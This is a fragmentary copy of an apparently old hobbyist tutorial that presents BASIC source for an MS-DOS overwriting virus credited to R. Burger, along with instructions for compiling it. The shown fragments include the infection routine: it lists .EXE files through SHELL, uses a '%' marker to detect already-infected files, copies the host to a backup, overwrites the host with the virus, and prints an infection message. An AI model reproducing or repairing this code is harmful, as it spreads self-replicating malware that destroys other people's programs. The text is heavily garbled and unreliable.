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great language and often people think of it as a limi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of any use in creating something like a virus.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rong. Lets take a look at a Basic Virus created by R. Burger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verwritting virus and uses (Shell) MS-DOS to infect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To do this you must compile the source code using a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SIC.Note the lenght of the compiled and the linked .EXE fi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place the lenght of the object program in the LENGH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BV3.EXE should be in the current directory,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LENGHTVIR variable must be set to the lenght of the link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member to use /e parameter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REM **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** MODIFY IT YOUR OWN WAY IF DESIR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REM ** BASIC DOESNT S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M ** NO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N ERROR GOTO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M *** LENGHTVIR MUST BE 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M *** TO THE LENGHT TO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M *** LINKED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NGHTVIR=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IRROOT$="BV3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M *** WRITE THE DIRECTORY IN THE FILE "INH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SHELL "DIR *.EXE&gt;INH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M ** OPEN "INH" FILE AND READ NA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OPEN "R",1,"INH",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LINE INPUT#1,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INE INPUT#1,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INE INPUT#1,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LINE INPUT#1,ORIGINAL$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ON ERROR GOT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CLOS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F=1:LINE INPUT#1,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EM ** "%" IS THE MARKER OF THE B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REM ** "%" IN THE NA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REM  ** INFECTED COP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F MID$(ORIGINAL$,1,1)="%" THEN GOTO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ORIGINAL$=MID$(ORIGINAL$,1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EXTENSIONS$=MID$(ORIGINAL,9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ID$(EXTENSIONS$,1,1)=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M *** CONCATENATE NAMES INTO FILENA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 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13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GO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ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTEN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ON ERROR GOTO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TEST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M ++ OPEN FILE FOUND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OPEN "R",2,OROGINAL$,LENGH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IF LOF(2) &lt; LENGHTVIR THEN GOTO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GET #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LINE INPUT#1,TE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CLOS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 REM ++ CHECK IF PROGRAM IS ILL +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REM ++ "%" AT THE END OF THE FILE MEA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REM ++ FILE IS ALREADY SICK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REM IF MID$(TEST,2,1)="%" THEN GOTO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ORIGINALS$=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MID$(ORIGINALS$,1,1)=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REM ++++ SANE "HEALTHY" PROGRAM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C$="COPY "+ORIGINAL$+" "+ORIGINALS$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SHELL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REM *** COPY VIRUS TO HEALTHY PROGRA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C$="COPY "+VIRROOT$+ORIGIN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SHELL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REM *** APPEND VIRUS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OPEN ORIGINAL$ FOR APPEND AS #1 LEN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WRITE#1,ORIGINALS$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REM ++ OUYPUT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PRINT "INFECTION IN " ;ORIGIANAL$; "  !! BE WAR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REM ** VIRUS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PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!"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virus will only attack .EXE files. After the execu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INH" file which contains the directory, and the file %S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start with "%" are NOT infected ,they pose as back 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